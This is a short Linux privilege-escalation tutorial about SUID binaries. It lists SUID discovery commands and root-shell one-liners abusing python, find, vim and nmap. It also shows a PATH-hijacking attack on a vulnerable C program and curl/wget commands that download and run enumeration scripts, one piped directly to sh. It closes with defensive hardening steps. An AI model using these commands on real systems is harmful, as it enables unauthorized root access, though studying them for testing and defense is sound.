SUID Binary Exploitation for Linux Privilege Escalation
SUID (Set User ID) binaries run with the permissions of the file owner, typically root. Misconfigured SUID binaries are a common privilege escalation vector in Linux environments.
Finding SUID Binaries
# Find all SUID binaries on the system find / -perm -4000 -type f 2>/dev/nullFind with detailed output
find / -perm -u=s -type f -exec ls -la {} ; 2>/dev/null
Common Exploitable Binaries (GTFOBins)
# Python SUID python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'Find with SUID
find . -exec /bin/sh -p ; -quit
Vim with SUID
vim -c ':!/bin/sh'
Nmap (older versions)
nmap --interactive nmap> !sh
Custom SUID Binary Exploitation
// Vulnerable SUID binary — calls system() without full path #include <stdio.h> #include <stdlib.h>
int main() { // PATH hijacking possible here system("cat /var/log/syslog"); return 0; }
# PATH hijacking attack
echo '/bin/bash -p' > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
./vulnerable_binary # Spawns root shellAutomated Enumeration
# Use LinPEAS for automated PrivEsc checks curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | shUse LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh chmod +x LinEnum.sh && ./LinEnum.sh
Defenses
- Audit SUID binaries regularly:
find / -perm -4000 2>/dev/null - Remove SUID bit from non-essential binaries:
chmod u-s /path/to/binary - Mount partitions with
nosuidflag where possible - Use AppArmor or SELinux profiles to restrict SUID execution
